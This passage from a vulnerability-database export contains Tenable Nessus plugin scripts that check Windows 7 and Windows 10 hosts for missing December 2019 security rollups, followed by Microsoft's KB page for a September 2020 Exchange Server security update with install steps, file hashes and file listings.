further\n compromise the users system. There are multiple ways an\n attacker could exploit the vulnerability, such as by\n convincing a user to open a specially crafted document,\n or by convincing a user to visit an untrusted webpage.\n The security update addresses the vulnerability by\n correcting how the Windows GDI component handles objects\n in memory. 
(CVE-2019-1465, CVE-2019-1466, CVE-2019-1467)\n\n - An information disclosure vulnerability exists when the\n win32k component improperly provides kernel information.\n An attacker who successfully exploited the vulnerability\n could obtain information to further compromise the users\n system. (CVE-2019-1469)\n\n - An elevation of privilege vulnerability exists in\n Windows when the Win32k component fails to properly\n handle objects in memory. An attacker who successfully\n exploited this vulnerability could run arbitrary code in\n kernel mode. An attacker could then install programs;\n view, change, or delete data; or create new accounts\n with full user rights. (CVE-2019-1458)\n\n - An information disclosure vulnerability exists when\n Windows Hyper-V on a host operating system fails to\n properly validate input from an authenticated user on a\n guest operating system. (CVE-2019-1470)\n\n - A security feature bypass vulnerability exists when\n Microsoft Defender improperly handles specific buffers.\n An attacker could exploit the vulnerability to trigger\n warnings and false positives when no threat is present.\n (CVE-2019-1488)\n\n - An elevation of privilege vulnerability exists when\n Windows improperly handles COM object creation. An\n attacker who successfully exploited the vulnerability\n could run arbitrary code with elevated privileges.\n (CVE-2019-1478)\n\n - A remote code execution vulnerability exists in the way\n that the VBScript engine handles objects in memory. The\n vulnerability could corrupt memory in such a way that an\n attacker could execute arbitrary code in the context of\n the current user. An attacker who successfully exploited\n the vulnerability could gain the same user rights as the\n current user. 
(CVE-2019-1485)\");\n # https://support.microsoft.com/en-us/help/4530734/windows-7-update-kb4530734\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?89866a56\");\n # https://support.microsoft.com/en-us/help/4530692/windows-7-update-kb4530692\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?abe20468\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Security Only update KB4530692 or Cumulative Update KB4530734.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2019-1468\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2019/12/10\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2019/12/10\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/12/10\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"stig_severity\", value:\"II\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2019-2020 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"smb_hotfixes_fcheck.inc\");\ninclude(\"smb_hotfixes.inc\");\ninclude(\"smb_func.inc\");\ninclude(\"misc_func.inc\");\n\nget_kb_item_or_exit(\"SMB/MS_Bulletin_Checks/Possible\");\n\nbulletin = \"MS19-12\";\nkbs = make_list('4530734', '4530692');\n\nif (get_kb_item(\"Host/patch_management_checks\")) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit(\"SMB/Registry/Enumerated\");\nget_kb_item_or_exit(\"SMB/WindowsVersion\", exit_code:1);\n\nif (hotfix_check_sp_range(win7:'1') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:\"6.1\",\n sp:1,\n rollup_date:\"12_2019\",\n bulletin:bulletin,\n rollup_kb_list:[4530734, 4530692])\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-04-01T10:36:54", "description": "The remote Windows host is missing security update 4530681.\nIt is, therefore, affected by multiple vulnerabilities :\n\n - A remote code execution vulnerability exists when\n Microsoft Windows OLE fails to properly validate user\n input. An attacker could exploit the vulnerability to\n execute malicious code. 
(CVE-2019-1484)\n\n - A denial of service vulnerability exists in Remote\n Desktop Protocol (RDP) when an attacker connects to the\n target system using RDP and sends specially crafted\n requests. An attacker who successfully exploited this\n vulnerability could cause the RDP service on the target\n system to stop responding. (CVE-2019-1453)\n\n - An information disclosure vulnerability exists when the\n Windows kernel improperly handles objects in memory. An\n attacker who successfully exploited this vulnerability\n could obtain information to further compromise the users\n system. (CVE-2019-1472, CVE-2019-1474)\n\n - A remote code execution vulnerability exists when the\n Windows font library improperly handles specially\n crafted embedded fonts. An attacker who successfully\n exploited this vulnerability could take control of the\n affected system. An attacker could then install\n programs; view, change, or delete data; or create new\n accounts with full user rights. (CVE-2019-1468)\n\n - An information disclosure vulnerability exists when the\n Windows GDI component improperly discloses the contents\n of its memory. An attacker who successfully exploited\n the vulnerability could obtain information to further\n compromise the users system. There are multiple ways an\n attacker could exploit the vulnerability, such as by\n convincing a user to open a specially crafted document,\n or by convincing a user to visit an untrusted webpage.\n The security update addresses the vulnerability by\n correcting how the Windows GDI component handles objects\n in memory. (CVE-2019-1465, CVE-2019-1466, CVE-2019-1467)\n\n - An information disclosure vulnerability exists when the\n win32k component improperly provides kernel information.\n An attacker who successfully exploited the vulnerability\n could obtain information to further compromise the users\n system. 
(CVE-2019-1469)\n\n - An elevation of privilege vulnerability exists in\n Windows when the Win32k component fails to properly\n handle objects in memory. An attacker who successfully\n exploited this vulnerability could run arbitrary code in\n kernel mode. An attacker could then install programs;\n view, change, or delete data; or create new accounts\n with full user rights. (CVE-2019-1458)\n\n - An information disclosure vulnerability exists when\n Windows Hyper-V on a host operating system fails to\n properly validate input from an authenticated user on a\n guest operating system. (CVE-2019-1470)\n\n - A security feature bypass vulnerability exists when\n Microsoft Defender improperly handles specific buffers.\n An attacker could exploit the vulnerability to trigger\n warnings and false positives when no threat is present.\n (CVE-2019-1488)\n\n - A remote code execution vulnerability exists in the way\n that the VBScript engine handles objects in memory. The\n vulnerability could corrupt memory in such a way that an\n attacker could execute arbitrary code in the context of\n the current user. An attacker who successfully exploited\n the vulnerability could gain the same user rights as the\n current user. 
(CVE-2019-1485)", "edition": 9, "cvss3": {"score": 8.8, "vector": "AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"}, "published": "2019-12-10T00:00:00", "title": "KB4530681: Windows 10 December 2019 Security Update", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2019-1458", "CVE-2019-1469", "CVE-2019-1467", "CVE-2019-1488", "CVE-2019-1468", "CVE-2019-1465", "CVE-2019-1453", "CVE-2019-1485", "CVE-2019-1484", "CVE-2019-1472", "CVE-2019-1470", "CVE-2019-1474", "CVE-2019-1466"], "modified": "2019-12-10T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS19_DEC_4530681.NASL", "href": "https://www.tenable.com/plugins/nessus/131925", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\n\n\n\n# The descriptive text and package checks in this plugin were \n# extracted from the Microsoft Security Updates API. The text\n# itself is copyright (C) Microsoft Corporation.\n#\n\n\n\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(131925);\n script_version(\"1.7\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2020/03/31\");\n\n script_cve_id(\n \"CVE-2019-1453\",\n \"CVE-2019-1458\",\n \"CVE-2019-1465\",\n \"CVE-2019-1466\",\n \"CVE-2019-1467\",\n \"CVE-2019-1468\",\n \"CVE-2019-1469\",\n \"CVE-2019-1470\",\n \"CVE-2019-1472\",\n \"CVE-2019-1474\",\n \"CVE-2019-1484\",\n \"CVE-2019-1485\",\n \"CVE-2019-1488\"\n );\n script_xref(name:\"MSKB\", value:\"4530681\");\n script_xref(name:\"MSFT\", value:\"MS19-4530681\");\n\n script_name(english:\"KB4530681: Windows 10 December 2019 Security Update\");\n script_summary(english:\"Checks for rollup.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 4530681.\nIt is, therefore, affected by multiple vulnerabilities :\n\n - A remote code execution vulnerability exists when\n Microsoft 
Windows OLE fails to properly validate user\n input. An attacker could exploit the vulnerability to\n execute malicious code. (CVE-2019-1484)\n\n - A denial of service vulnerability exists in Remote\n Desktop Protocol (RDP) when an attacker connects to the\n target system using RDP and sends specially crafted\n requests. An attacker who successfully exploited this\n vulnerability could cause the RDP service on the target\n system to stop responding. (CVE-2019-1453)\n\n - An information disclosure vulnerability exists when the\n Windows kernel improperly handles objects in memory. An\n attacker who successfully exploited this vulnerability\n could obtain information to further compromise the users\n system. (CVE-2019-1472, CVE-2019-1474)\n\n - A remote code execution vulnerability exists when the\n Windows font library improperly handles specially\n crafted embedded fonts. An attacker who successfully\n exploited this vulnerability could take control of the\n affected system. An attacker could then install\n programs; view, change, or delete data; or create new\n accounts with full user rights. (CVE-2019-1468)\n\n - An information disclosure vulnerability exists when the\n Windows GDI component improperly discloses the contents\n of its memory. An attacker who successfully exploited\n the vulnerability could obtain information to further\n compromise the users system. There are multiple ways an\n attacker could exploit the vulnerability, such as by\n convincing a user to open a specially crafted document,\n or by convincing a user to visit an untrusted webpage.\n The security update addresses the vulnerability by\n correcting how the Windows GDI component handles objects\n in memory. 
(CVE-2019-1465, CVE-2019-1466, CVE-2019-1467)\n\n - An information disclosure vulnerability exists when the\n win32k component improperly provides kernel information.\n An attacker who successfully exploited the vulnerability\n could obtain information to further compromise the users\n system. (CVE-2019-1469)\n\n - An elevation of privilege vulnerability exists in\n Windows when the Win32k component fails to properly\n handle objects in memory. An attacker who successfully\n exploited this vulnerability could run arbitrary code in\n kernel mode. An attacker could then install programs;\n view, change, or delete data; or create new accounts\n with full user rights. (CVE-2019-1458)\n\n - An information disclosure vulnerability exists when\n Windows Hyper-V on a host operating system fails to\n properly validate input from an authenticated user on a\n guest operating system. (CVE-2019-1470)\n\n - A security feature bypass vulnerability exists when\n Microsoft Defender improperly handles specific buffers.\n An attacker could exploit the vulnerability to trigger\n warnings and false positives when no threat is present.\n (CVE-2019-1488)\n\n - A remote code execution vulnerability exists in the way\n that the VBScript engine handles objects in memory. The\n vulnerability could corrupt memory in such a way that an\n attacker could execute arbitrary code in the context of\n the current user. An attacker who successfully exploited\n the vulnerability could gain the same user rights as the\n current user. 
(CVE-2019-1485)\");\n # https://support.microsoft.com/en-us/help/4530681/windows-10-update-kb4530681\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?3629add0\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Cumulative Update KB4530681.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2019-1468\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2019/12/10\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2019/12/10\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/12/10\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2019-2020 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"smb_hotfixes_fcheck.inc\");\ninclude(\"smb_hotfixes.inc\");\ninclude(\"smb_func.inc\");\ninclude(\"misc_func.inc\");\n\nget_kb_item_or_exit(\"SMB/MS_Bulletin_Checks/Possible\");\n\nbulletin = \"MS19-12\";\nkbs = make_list('4530681');\n\nif (get_kb_item(\"Host/patch_management_checks\")) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit(\"SMB/Registry/Enumerated\");\nget_kb_item_or_exit(\"SMB/WindowsVersion\", exit_code:1);\n\nif (hotfix_check_sp_range(win10:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:\"10\",\n sp:0,\n os_build:\"10240\",\n rollup_date:\"12_2019\",\n bulletin:bulletin,\n rollup_kb_list:[4530681])\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "mskb": [{"lastseen": "2021-01-01T22:51:06", "bulletinFamily": "microsoft", "cvelist": ["CVE-2020-16875"], "description": "<html><body><p>Description of the security update for Microsoft Exchange Server 2019 and 2016: September 8, 2020</p><h2></h2><p>This update rollup is a security update that\u00a0resolves vulnerabilities in Microsoft Exchange Server. 
To learn more about these vulnerabilities, see the following security advisory:</p><ul><li><a data-content-id=\"\" data-content-type=\"\" href=\"https://portal.msrc.microsoft.com/en-us/security-guidance/advisory/CVE-2020-16875\" managed-link=\"\" target=\"_blank\">CVE-2020-16875 |\u00a0Microsoft Exchange Memory Corruption Vulnerability</a></li></ul><h2>Known issues in this update</h2><ul><li><p>When you try to manually install this security update by double-clicking the update file (.msp) to run it in Normal mode\u00a0(that is, not as an administrator), some files are not correctly updated.</p><p>When this issue occurs, you don\u2019t receive an error message or any indication that the security update was not correctly installed. However, Outlook Web Access (OWA) and the Exchange Control Panel (ECP) may stop working.<br/><br/>This issue occurs on servers that are using User Account Control (UAC). The issue occurs because the security update doesn\u2019t correctly stop certain Exchange-related services.</p><p>To avoid this issue, follow these steps to manually install this security update:</p><ol><li>Select <strong>Start</strong>, and type\u00a0<strong>cmd</strong>.</li><li>In the results, right-click <strong>Command Prompt</strong>, and then select <strong>Run as administrator</strong>.</li><li>If the <strong>User Account Control</strong> dialog box appears, verify that the default action is the action that you want, and then select <strong>Continue</strong>.</li><li>Type the full path of the .msp file, and then press Enter.</li></ol><p>This issue does not occur if you install the update through Microsoft Update.</p></li><li><p>Exchange services may remain in a disabled state after you install this security update. This condition does not indicate that the update is not installed correctly. 
This condition may occur if the service control scripts experience a problem when they try to return Exchange services to their\u00a0usual state.<br/><br/>To fix this issue, use Services Manager to restore the startup type to <strong>Automatic</strong>, and then start the affected Exchange services manually. To avoid this issue, run the security update at an elevated command prompt. For more information about how to open an elevated Command Prompt window, see\u00a0<a data-content-id=\"\" data-content-type=\"\" href=\"https://technet.microsoft.com/en-us/library/cc947813(v=ws.10).aspx\" managed-link=\"\" target=\"_blank\">Start a Command Prompt as an Administrator</a>.</p></li></ul><h2>How to get and install the update</h2><h3>Method 1: Microsoft Update</h3><p>This update is available through Windows Update. When you turn on automatic updating, this update will be downloaded and installed automatically.\u00a0<span><span>For more information about how to turn on automatic updating, see </span></span> <a data-content-id=\"\" data-content-type=\"\" href=\"https://support.microsoft.com/help/12373/windows-update-faq\" managed-link=\"\" target=\"_blank\">Windows Update: FAQ</a>.</p><h3>Method 2: Microsoft Update Catalog</h3><p>To get the standalone package for this update, go to the\u00a0<a data-content-id=\"\" data-content-type=\"\" href=\"http://www.catalog.update.microsoft.com/Search.aspx?q=KB4577352\" managed-link=\"\" target=\"_blank\">Microsoft Update Catalog</a>\u00a0website.</p><h3>Method 3: Microsoft Download Center</h3><p>You can get the standalone update package through the Microsoft Download Center.</p><ul linespacing=\"1\" style=\"list-style-type:UnorderedBullets\" type=\"UnorderedBullets\"><li><a data-content-id=\"\" data-content-type=\"\" href=\"http://www.microsoft.com/download/details.aspx?familyid=4b14aea8-7179-4689-ae09-94da952869ac\" 
managed-link=\"\" target=\"_blank\">Download Security Update For Exchange Server 2019 Cumulative Update 6 (KB4577352)</a></li><li><a data-content-id=\"\" data-content-type=\"\" href=\"http://www.microsoft.com/download/details.aspx?familyid=8842cfd3-2585-404b-89e4-1718f67e232c\" managed-link=\"\" target=\"_blank\">Download Security Update For Exchange Server 2019 Cumulative Update 5 (KB4577352)</a></li><li><a data-content-id=\"\" data-content-type=\"\" href=\"http://www.microsoft.com/download/details.aspx?familyid=589d2f7f-31bf-48c5-aaf2-fc69999097d4\" managed-link=\"\" target=\"_blank\">Download Security Update For Exchange Server 2016 Cumulative Update 17 (KB4577352)</a></li><li><a data-content-id=\"\" data-content-type=\"\" href=\"http://www.microsoft.com/download/details.aspx?familyid=8af5b070-a354-4ec2-941e-750b154b771f\" managed-link=\"\" target=\"_blank\">Download Security Update For Exchange Server 2016 Cumulative Update 16 (KB4577352)</a></li></ul><h2>More information</h2><h3>Security update deployment information</h3><p>For deployment information about this update, see\u00a0<a aria-live=\"rude\" data-bi-name=\"content-anchor-link\" data-content-id=\"\" data-content-type=\"\" href=\"https://support.microsoft.com/help/20200908\" managed-link=\"\" tabindex=\"0\" target=\"_blank\">security update deployment information: September 8, 2020</a>.\u00a0</p><h3>Security update replacement information</h3><p>This security update replaces the following previously released updates:</p><ul><li><a data-content-id=\"4536987\" data-content-type=\"article\" href=\"\" managed-link=\"\" target=\"_blank\">Description of the security update for 
Microsoft Exchange Server 2019 and 2016: March 10, 2020</a></li></ul><h2>File information</h2><h3>File hash information</h3><table class=\"table\"><tbody><tr><th>Update name</th><th>File name</th><th>SHA1 hash</th><th>SHA256 hash</th></tr><tr><td>Exchange Server 2019 Cumulative Update 6</td><td>Exchange2019-KB4577352-x64-en.msp</td><td>5B3B0B62C5E569DD5933C7BA9B1CCC6DB4E345BA</td><td>505D471F51C9FCAB7DAB05B5BC1AFD90F29B3C5E220B0BD8C4B2294DC73FB2FA</td></tr><tr><td>Exchange Server 2019 Cumulative Update 5</td><td>Exchange2019-KB4577352-x64-en.msp</td><td>BB2831C140538F45CBAC9F819ECBD95A1B07DDAC</td><td>5D9DAAF411F0C5DEA72BBD238DACC3852D90EDCAAA4CBA1D909C93ED061EC122</td></tr><tr><td>Exchange Server 2016 Cumulative Update 17</td><td>Exchange2016-KB4577352-x64-en.msp</td><td>CE5F53FDE5F3DFE491B80CE27FEA735EBAA929BC</td><td>176F74049CC7B9087A7C6190DBD85EC0A1B269FC8EE4F646CF17710B5E97924C</td></tr><tr><td>Exchange Server 2016 Cumulative Update 16</td><td>Exchange2016-KB4577352-x64-en.msp</td><td>F6227A7AE5DFDDBE27E8F3C6BB3AD5D3907FCF52</td><td>851E0361A4300E44A3F01E20E125191CC1728FE30EA3298B9FA1E3D49AF89000</td></tr></tbody></table><h3>Exchange server file information</h3><p>The English (United States) version of this update installs files that have the attributes that are listed in the following tables. The dates and times for these files are listed in Coordinated Universal Time (UTC). The dates and times for these files on your local computer are displayed in your local time together with your current daylight-saving time (DST) bias. 
Additionally, the dates and times may change when you perform certain operations on the files.</p><div class=\"faq-section\" faq-section=\"\"><div class=\"faq-panel\"><div class=\"faq-panel-heading\" faq-panel-heading=\"\"><span class=\"link-expand-image\"><span class=\"faq-chevron win-icon win-icon-ChevronUpSmall\"></span></span><span class=\"bold btn-link link-expand-text\">Exchange Server 2019 Cumulative Update 6</span></div><div class=\"faq-panel-body\" faq-panel-body=\"\"><table class=\"table\"><tbody><tr><th>File name</th><th>File version</th><th>File size</th><th>Date</th><th>Time</th><th>Platform</th></tr><tr><td>Activemonitoringeventmsg.dll</td><td>15.2.659.6</td><td>71,040</td><td>12-Aug-2020</td><td>21:25</td><td>x64</td></tr><tr><td>Activemonitoringexecutionlibrary.ps1</td><td>Not applicable</td><td>29,522</td><td>12-Aug-2020</td><td>21:25</td><td>Not applicable</td></tr><tr><td>Adduserstopfrecursive.ps1</td><td>Not applicable</td><td>14,929</td><td>12-Aug-2020</td><td>21:26</td><td>Not applicable</td></tr><tr><td>Ademodule.dll</td><td>15.2.659.6</td><td>106,376</td><td>12-Aug-2020</td><td>21:26</td><td>x64</td></tr><tr><td>Airfilter.dll</td><td>15.2.659.6</td><td>42,888</td><td>12-Aug-2020</td><td>21:25</td><td>x64</td></tr><tr><td>Ajaxcontroltoolkit.dll</td><td>15.2.659.6</td><td>92,544</td><td>12-Aug-2020</td><td>21:25</td><td>x86</td></tr><tr><td>Antispamcommon.ps1</td><td>Not applicable</td><td>13,505</td><td>12-Aug-2020</td><td>21:26</td><td>Not applicable</td></tr><tr><td>Asdat.msi</td><td>Not applicable</td><td>5,087,232</td><td>12-Aug-2020</td><td>21:25</td><td>Not applicable</td></tr><tr><td>Asentirs.msi</td><td>Not applicable</td><td>77,824</td><td>12-Aug-2020</td><td>21:27</td><td>Not applicable</td></tr><tr><td>Asentsig.msi</td><td>Not applicable</td><td>73,728</td><td>12-Aug-2020</td><td>21:27</td><td>Not 
applicable</td></tr><tr><td>Bigfunnel.bondtypes.dll</td><td>15.2.659.6</td><td>45,448</td><td>12-Aug-2020</td><td>21:26</td><td>x86</td></tr><tr><td>Bigfunnel.common.dll</td><td>15.2.659.6</td><td>66,424</td><td>12-Aug-2020</td><td>21:25</td><td>x86</td></tr><tr><td>Bigfunnel.configuration.dll</td><td>15.2.659.6</td><td>118,144</td><td>12-Aug-2020</td><td>21:25</td><td>x86</td></tr><tr><td>Bigfunnel.entropy.dll</td><td>15.2.659.6</td><td>44,424</td><td>12-Aug-2020</td><td>21:25</td><td>x86</td></tr><tr><td>Bigfunnel.filter.dll</td><td>15.2.659.6</td><td>54,152</td><td>12-Aug-2020</td><td>21:25</td><td>x86</td></tr><tr><td>Bigfunnel.indexstream.dll</td><td>15.2.659.6</td><td>68,984</td><td>12-Aug-2020</td><td>21:26</td><td>x86</td></tr><tr><td>Bigfunnel.neuraltree.dll</td><td>Not applicable</td><td>694,144</td><td>12-Aug-2020</td><td>21:25</td><td>x64</td></tr><tr><td>Bigfunnel.neuraltreeranking.dll</td><td>15.2.659.6</td><td>19,840</td><td>12-Aug-2020</td><td>21:25</td><td>x86</td></tr><tr><td>Bigfunnel.poi.dll</td><td>15.2.659.6</td><td>245,128</td><td>12-Aug-2020</td><td>21:25</td><td>x86</td></tr><tr><td>Bigfunnel.postinglist.dll</td><td>15.2.659.6</td><td>189,320</td><td>12-Aug-2020</td><td>21:26</td><td>x86</td></tr><tr><td>Bigfunnel.query.dll</td><td>15.2.659.6</td><td>101,248</td><td>12-Aug-2020</td><td>21:25</td><td>x86</td></tr><tr><td>Bigfunnel.ranking.dll</td><td>15.2.659.6</td><td>109,440</td><td>12-Aug-2020</td><td>21:25</td><td>x86</td></tr><tr><td>Bigfunnel.syntheticdatalib.dll</td><td>15.2.659.6</td><td>3,634,560</td><td>12-Aug-2020</td><td>21:25</td><td>x86</td></tr><tr><td>Bigfunnel.tracing.dll</td><td>15.2.659.6</td><td>42,888</td><td>12-Aug-2020</td><td>21:25</td><td>x86</td></tr><tr><td>Bigfunnel.wordbreakers.dll</td><td>15.2.659.6</td><td>46,472</td><td>12-Aug-2020</td><td>21:25</td><td>x86</td></tr><tr><td>Cafe_airfilter_dll</td><td>15.2.659.6</td><td>42,888</td><td>12-Aug-2020</td><td>21:25</td><td>x64</td></tr><tr><td>Cafe_exppw_dll</td><td>
15.2.659.6</td><td>83,336</td><td>12-Aug-2020</td><td>21:25</td><td>x64</td></tr><tr><td>Cafe_owaauth_dll</td><td>15.2.659.6</td><td>92,032</td><td>12-Aug-2020</td><td>21:25</td><td>x64</td></tr><tr><td>Calcalculation.ps1</td><td>Not applicable</td><td>42,097</td><td>12-Aug-2020</td><td>21:27</td><td>Not applicable</td></tr><tr><td>Checkdatabaseredundancy.ps1</td><td>Not applicable</td><td>94,622</td><td>12-Aug-2020</td><td>21:25</td><td>Not applicable</td></tr><tr><td>Chksgfiles.dll</td><td>15.2.659.6</td><td>57,224</td><td>12-Aug-2020</td><td>21:26</td><td>x64</td></tr><tr><td>Citsconstants.ps1</td><td>Not applicable</td><td>15,805</td><td>12-Aug-2020</td><td>21:26</td><td>Not applicable</td></tr><tr><td>Citslibrary.ps1</td><td>Not applicable</td><td>82,664</td><td>12-Aug-2020</td><td>21:26</td><td>Not applicable</td></tr><tr><td>Citstypes.ps1</td><td>Not applicable</td><td>14,464</td><td>12-Aug-2020</td><td>21:26</td><td>Not applicable</td></tr><tr><td>Classificationengine_mce</td><td>15.2.659.6</td><td>1,693,576</td><td>12-Aug-2020</td><td>21:25</td><td>Not applicable</td></tr><tr><td>Clusmsg.dll</td><td>15.2.659.6</td><td>134,016</td><td>12-Aug-2020</td><td>21:27</td><td>x64</td></tr><tr><td>Coconet.dll</td><td>15.2.659.6</td><td>48,008</td><td>12-Aug-2020</td><td>21:26</td><td>x64</td></tr><tr><td>Collectovermetrics.ps1</td><td>Not applicable</td><td>81,644</td><td>12-Aug-2020</td><td>21:25</td><td>Not applicable</td></tr><tr><td>Collectreplicationmetrics.ps1</td><td>Not applicable</td><td>41,886</td><td>12-Aug-2020</td><td>21:25</td><td>Not applicable</td></tr><tr><td>Commonconnectfunctions.ps1</td><td>Not applicable</td><td>29,931</td><td>12-Aug-2020</td><td>21:25</td><td>Not applicable</td></tr><tr><td>Complianceauditservice.exe</td><td>15.2.659.6</td><td>39,808</td><td>12-Aug-2020</td><td>21:25</td><td>x86</td></tr><tr><td>Configureadam.ps1</td><td>Not applicable</td><td>22,764</td><td>12-Aug-2020</td><td>21:26</td><td>Not 
applicable</td></tr><tr><td>Configurecaferesponseheaders.ps1</td><td>Not applicable</td><td>20,308</td><td>12-Aug-2020</td><td>21:26</td><td>Not applicable</td></tr><tr><td>Configurecryptodefaults.ps1</td><td>Not applicable</td><td>42,039</td><td>12-Aug-2020</td><td>21:27</td><td>Not applicable</td></tr><tr><td>Configurenetworkprotocolparameters.ps1</td><td>Not applicable</td><td>19,770</td><td>12-Aug-2020</td><td>21:27</td><td>Not applicable</td></tr><tr><td>Configuresmbipsec.ps1</td><td>Not applicable</td><td>39,828</td><td>12-Aug-2020</td><td>21:26</td><td>Not applicable</td></tr><tr><td>Configure_enterprisepartnerapplication.ps1</td><td>Not applicable</td><td>22,283</td><td>12-Aug-2020</td><td>21:27</td><td>Not applicable</td></tr><tr><td>Connectfunctions.ps1</td><td>Not applicable</td><td>37,125</td><td>12-Aug-2020</td><td>21:25</td><td>Not applicable</td></tr><tr><td>Connect_exchangeserver_help.xml</td><td>Not applicable</td><td>29,620</td><td>12-Aug-2020</td><td>21:25</td><td>Not applicable</td></tr><tr><td>Consoleinitialize.ps1</td><td>Not applicable</td><td>24,232</td><td>12-Aug-2020</td><td>21:26</td><td>Not applicable</td></tr><tr><td>Convertoabvdir.ps1</td><td>Not applicable</td><td>20,053</td><td>12-Aug-2020</td><td>21:27</td><td>Not applicable</td></tr><tr><td>Converttomessagelatency.ps1</td><td>Not applicable</td><td>14,532</td><td>12-Aug-2020</td><td>21:26</td><td>Not applicable</td></tr><tr><td>Convert_distributiongrouptounifiedgroup.ps1</td><td>Not applicable</td><td>34,765</td><td>12-Aug-2020</td><td>21:26</td><td>Not applicable</td></tr><tr><td>Create_publicfoldermailboxesformigration.ps1</td><td>Not applicable</td><td>27,912</td><td>12-Aug-2020</td><td>21:27</td><td>Not applicable</td></tr><tr><td>Cts.14.0.microsoft.exchange.data.common.versionpolicy.cfg</td><td>Not applicable</td><td>499</td><td>12-Aug-2020</td><td>18:15</td><td>Not applicable</td></tr><tr><td>Cts.14.1.microsoft.exchange.data.common.versionpolicy.cfg</td><td>Not 
